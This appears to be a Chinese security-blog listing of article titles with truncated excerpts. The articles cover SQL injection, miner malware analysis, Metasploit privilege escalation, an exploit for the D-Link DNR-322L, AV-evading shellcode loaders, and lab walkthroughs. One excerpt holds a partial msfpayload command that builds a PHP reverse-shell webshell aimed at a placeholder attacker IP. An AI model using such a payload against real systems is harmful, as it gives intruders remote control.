什么是SQL注入?SQL 注入是一种针对使用 SQL(结构化查询语言)数据库的 Web 应用程序的攻击。攻击涉及将恶意 SQL 代码注入 Web 应用程序的输入字段,然后可以由应用程序的数据库执行。S...
新型挖矿恶意软件Minas的分析
2022年6月,卡巴斯基实验室的研究人员在一个系统进程的内存中发现了一个可疑的shellcode。为此,他们深入分析了shellcode是如何放置到进程中的,以及受感染系统上的威胁隐藏在何处?感染链虽...
利用metasploit进行提权(Php + Linux)Shell反弹
当LINUX提权反弹不了时.经常遇到这种情况 请出MSF ..生成WEBSHELL文件 msf > msfpayload php/reverse_php LHOST=你的IP LPOR...
分享一个渗透测试辅助工具箱
SwordHost 工具说明 渗透测试辅助工具箱 运行条件:jdk8+ 双击即可运行 反弹shell,命令生成器,自动编码,输入对应IP端口即可,实现一劳永逸,集成一些小工具,辅助渗透,提高效率 输入...
D-Link DNR-322L - 经过身份验证的远程代码执行.exploit.py
标题:D-Link DNR-322L - 经过身份验证的远程代码执行CVE:CVE-2022-40799公告:https://supportannouncement.us.dlink.com/anno...
实战|一次对BC网站的渗透测试
作者:xzajyjs, 转载于FreeBuf.COM 法律声明 此渗透测试后已将所有信息移交警方,请勿用于非法用途。 信息搜集 首先当然是通过fofa进行bc网站的后台搜集(搜索语法大家自行探索),获...
实战|又一起挖矿木马排查
序组里有同学说他们机器被攻击了 :(出现的问题是有个进程占满了 cpu,并且干不掉他那么开搞 :)分析登录之后看到了熟悉的随机字符串为文件名的占满了 CPU 的程序先想到了上次帮曾大佬同学看的那台机器...
干货分享 | ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免...
社会工程学 | shellcode加载器
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。今天又是阳光明媚的得一...
sqli学习笔记-07
sqli学习笔记-07声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。前言从这一关开始学习...
靶机-PhotoBomb
信息收集端口扫描扫太慢了,就少扫点东西sudo nmap -sV -p- —min-rate 1000 10.10.11.182PORT STATE SERVICE VERSION22/tcp ope...
检测linux进程注入1:proc方式
通过从proc文件系统入手,来检测可能的ptrace进程注入探究根据man proc的结果,在 /proc/[pid]/status的字段描述有这么一段* TracerPid: PID of proc...